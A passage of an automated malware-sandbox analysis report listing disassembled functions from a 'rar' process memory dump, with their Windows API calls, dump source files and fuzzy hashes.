                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D,?,?,00000000), ref: 00007FF6FAA439A6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2287278272-0
                                                                                                                                                                                                                                • Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                • Instruction ID: 8464d4586d3309736422a9d415b354ba1152a818175d9268e44ed05b826cdf87
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2041D422A0CA4142FB508B15A41177AA7A0BF867A4F104275FEAD877E9FF7DD40F8B00
                                                                                                                                                                                                                                Function 00007FF6FAA70244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                • Instruction ID: 4737ae4688142e412c62d93a69a2a1a4df5e586ad3cfde072c5886093d7520d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F41B462A0CAC285EB619B21D0503BF2790EF50B84F184572DBADC6ADDFF2CE55B8350
                                                                                                                                                                                                                                Function 00007FF6FAA85120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4141327611-0
                                                                                                                                                                                                                                • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                • Instruction ID: f3eefea7efb58d10738c797987ec515fec005eeaf54eef6ea48e84e37c7f7f52
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71419032A0D7C346FB65AB519040379A7A5EF50B90F5481B0DEAD86AD9FF3CE84B8700
                                                                                                                                                                                                                                Function 00007FF6FAA3D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D09D
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D0E5
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D114
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF6FAA286CB,?,?,?,00007FF6FAA2A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6FAA22DF9), ref: 00007FF6FAA3D15C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                • Instruction ID: f107410cfd0974a4a8ed6419a65d2e07d61725c0d82150c27247680645afe23d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04316032618B4582E7A08F11F5557AA77A0F789BA8F504329EEBD47BC8DF3DD4098B04
                                                                                                                                                                                                                                Function 00007FF6FAA6B4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1171435874-0
                                                                                                                                                                                                                                • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                • Instruction ID: 1d143abf8adbd2fbc74b0115926987af9cd83bf8bed4e7f05a4a1333c6ddcdf5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24113C32A986428AE7648B18E6843BC6261EB89740F200079C72F977D5EF2DB85F4A04
                                                                                                                                                                                                                                Function 00007FF6FAA85630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$abort
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1447195878-0
                                                                                                                                                                                                                                • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                • Instruction ID: 9b5e70cc3f2b17c0f62f2173edb9c858b72e72612d798fc750be4a956f065d03
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75019A20B0D68343FB59A771965513993969F48BC0F0806B8ED3E86BD6FD2DE84F4200
                                                                                                                                                                                                                                Function 00007FF6FAA6B850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 502429940-0
                                                                                                                                                                                                                                • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                • Instruction ID: f055207ec4ced412b2f1200a883835b9a67ee3366f8f3a4654242fc2598676c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06118232614A41D7E3549B24E544669A330FB8ABA0F000231DBBD533E5DF3AE47AC704
                                                                                                                                                                                                                                Function 00007FF6FAA858A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                                • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                • Instruction ID: e926bb93ee9d991247aab85109453c5ef9f6231b7edde4a3e382dd3d8abd7531
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA910662B0D3C786EB258F259184378AB99AB25BD0F048171CEAD873D5FE3DE51AC301
                                                                                                                                                                                                                                Function 00007FF6FAA5CFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
                                                                                                                                                                                                                                • new.LIBCMT ref: 00007FF6FAA5CFD9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID: rar$rev
                                                                                                                                                                                                                                • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                • Opcode ID: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
                                                                                                                                                                                                                                • Instruction ID: 95f34a9d5685c6800b3a2bf855e594ee73b6e5ba0cf7e92d6a4ce3f153de5954
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50351231c3f8732b734c05f1f2968c465adcf4732fcc2a7da3cc46214972e448
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8A1DF22E097928AEB20DB68C4542BD63A5FF44B84F4540B5DA7E876D6FF2CE54AC304
                                                                                                                                                                                                                                Function 00007FF6FAA7F7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: *
                                                                                                                                                                                                                                • API String ID: 3215553584-163128923
                                                                                                                                                                                                                                • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                • Instruction ID: 604ddb360e157dc0a07a3cb40a7dbc404bec5f6175bd558469a458ae74654943
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0971627391865286E7648F38804103E37A0FB45F58F2411B6DA6AC23DDEF39D68AD725
                                                                                                                                                                                                                                Function 00007FF6FAA85CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
